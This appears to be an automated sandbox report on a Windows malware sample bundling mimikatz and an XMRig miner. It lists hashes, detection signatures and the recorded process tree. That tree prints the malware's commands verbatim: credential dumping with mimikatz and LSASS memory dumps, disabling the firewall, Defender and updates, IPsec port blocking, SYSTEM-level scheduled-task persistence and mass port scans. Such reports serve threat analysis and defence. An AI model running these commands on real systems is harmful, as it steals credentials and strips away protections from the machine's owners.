Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2025 10:08

General

  • Target

    2025-01-05_a12c4681abe9dcb45b732dc9ec907742_hacktools_icedid_mimikatz.exe

  • Size

    9.1MB

  • MD5

    a12c4681abe9dcb45b732dc9ec907742

  • SHA1

    f7cf7023eb6fbdcaed3543c9c72a4d49c0828152

  • SHA256

    f20f56a6a8dc3d3354d2b52e4253772a273b3b257c50340c69259eea4a0b8b22

  • SHA512

    e00c561aad414c94f280b9736a259a35e92d53b1a3c3b5c47721daaf17cf0aec762477b45d13a05106e782c51fe0275a20ca328665e289af686d3ec6b9a5ba04

  • SSDEEP

    196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYeZbXQ:agjz0E57/iv1h0

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30679) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1740
      • C:\Windows\TEMP\igegeutip\heuhqk.exe
        "C:\Windows\TEMP\igegeutip\heuhqk.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2736
    • C:\Users\Admin\AppData\Local\Temp\2025-01-05_a12c4681abe9dcb45b732dc9ec907742_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-01-05_a12c4681abe9dcb45b732dc9ec907742_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2328
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\qpkiztfb\jaettyt.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2576
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3036
        • C:\Windows\qpkiztfb\jaettyt.exe
          C:\Windows\qpkiztfb\jaettyt.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1052
    • C:\Windows\qpkiztfb\jaettyt.exe
      C:\Windows\qpkiztfb\jaettyt.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3700
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2408
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4064
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4620
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2728
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:4940
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3660
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:1580
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\ktbcclcbi\pgwtlrdzw\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1888
          • C:\Windows\ktbcclcbi\pgwtlrdzw\wpcap.exe
            C:\Windows\ktbcclcbi\pgwtlrdzw\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3176
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1332
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4124
            • C:\Windows\SysWOW64\net.exe
              net stop "TrueSight Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2180
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "TrueSight Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4460
            • C:\Windows\SysWOW64\net.exe
              net stop npf
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5020
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop npf
                5⤵
                  PID:3508
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1488
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2716
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:4900
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
                PID:3740
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1576
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1052
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4208
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2536
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\ktbcclcbi\pgwtlrdzw\uilutlrif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ktbcclcbi\pgwtlrdzw\Scant.txt
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3632
              • C:\Windows\ktbcclcbi\pgwtlrdzw\uilutlrif.exe
                C:\Windows\ktbcclcbi\pgwtlrdzw\uilutlrif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ktbcclcbi\pgwtlrdzw\Scant.txt
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:4320
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\ktbcclcbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ktbcclcbi\Corporate\log.txt
              2⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:4436
              • C:\Windows\ktbcclcbi\Corporate\vfshost.exe
                C:\Windows\ktbcclcbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2112
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtkutiuha" /ru system /tr "cmd /c C:\Windows\ime\jaettyt.exe"
              2⤵
                PID:4828
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2244
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "gtkutiuha" /ru system /tr "cmd /c C:\Windows\ime\jaettyt.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3564
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iugdqptyd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qpkiztfb\jaettyt.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2152
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:1020
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "iugdqptyd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qpkiztfb\jaettyt.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:972
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gagaujzua" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\igegeutip\heuhqk.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3020
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1832
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "gagaujzua" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\igegeutip\heuhqk.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2156
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:388
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2800
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:4124
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1016
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4476
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2276
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2328
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1288
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3036
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4132
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3148
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2520
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2708
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3632
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                        PID:2380
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2804
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1704
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1928
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3540
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4012
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                        PID:2288
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3548
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop WinDefend
                      2⤵
                        PID:3692
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1904
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                              PID:2004
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                            PID:804
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2244
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:8
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config MpsSvc start= disabled
                            2⤵
                              PID:1308
                              • C:\Windows\SysWOW64\sc.exe
                                sc config MpsSvc start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4712
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config SharedAccess start= disabled
                              2⤵
                                PID:4364
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config SharedAccess start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:5112
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config WinDefend start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4008
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WinDefend start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4788
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config wuauserv start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:5108
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  PID:2112
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 776 C:\Windows\TEMP\ktbcclcbi\776.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3092
                              • C:\Windows\TEMP\xohudmc.exe
                                C:\Windows\TEMP\xohudmc.exe
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:2092
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 316 C:\Windows\TEMP\ktbcclcbi\316.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4240
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 1740 C:\Windows\TEMP\ktbcclcbi\1740.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1560
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 2600 C:\Windows\TEMP\ktbcclcbi\2600.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4556
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 2696 C:\Windows\TEMP\ktbcclcbi\2696.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2516
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 3008 C:\Windows\TEMP\ktbcclcbi\3008.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4024
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 3028 C:\Windows\TEMP\ktbcclcbi\3028.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3212
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 3784 C:\Windows\TEMP\ktbcclcbi\3784.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3872
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 3880 C:\Windows\TEMP\ktbcclcbi\3880.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2356
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 3944 C:\Windows\TEMP\ktbcclcbi\3944.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1360
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 4028 C:\Windows\TEMP\ktbcclcbi\4028.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2608
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 4420 C:\Windows\TEMP\ktbcclcbi\4420.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:448
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 5024 C:\Windows\TEMP\ktbcclcbi\5024.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2328
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 2176 C:\Windows\TEMP\ktbcclcbi\2176.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2404
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 4492 C:\Windows\TEMP\ktbcclcbi\4492.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2424
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 1660 C:\Windows\TEMP\ktbcclcbi\1660.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2572
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 4432 C:\Windows\TEMP\ktbcclcbi\4432.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4552
                              • C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe
                                C:\Windows\TEMP\ktbcclcbi\fpitymcii.exe -accepteula -mp 4388 C:\Windows\TEMP\ktbcclcbi\4388.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3056
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c C:\Windows\ktbcclcbi\pgwtlrdzw\scan.bat
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:5116
                                • C:\Windows\ktbcclcbi\pgwtlrdzw\uutllwily.exe
                                  uutllwily.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:2208
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                2⤵
                                  PID:2864
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                      PID:4736
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                      3⤵
                                        PID:1256
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2800
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1176
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5128
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5380
                                  • C:\Windows\SysWOW64\wooakm.exe
                                    C:\Windows\SysWOW64\wooakm.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1268
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\igegeutip\heuhqk.exe /p everyone:F
                                    1⤵
                                      PID:3972
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:3548
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\igegeutip\heuhqk.exe /p everyone:F
                                          2⤵
                                            PID:2140
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qpkiztfb\jaettyt.exe /p everyone:F
                                          1⤵
                                            PID:3756
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:2372
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\qpkiztfb\jaettyt.exe /p everyone:F
                                                2⤵
                                                  PID:2228
                                              • C:\Windows\system32\cmd.EXE
                                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\jaettyt.exe
                                                1⤵
                                                  PID:2004
                                                  • C:\Windows\ime\jaettyt.exe
                                                    C:\Windows\ime\jaettyt.exe
                                                    2⤵
                                                    • Executes dropped EXE
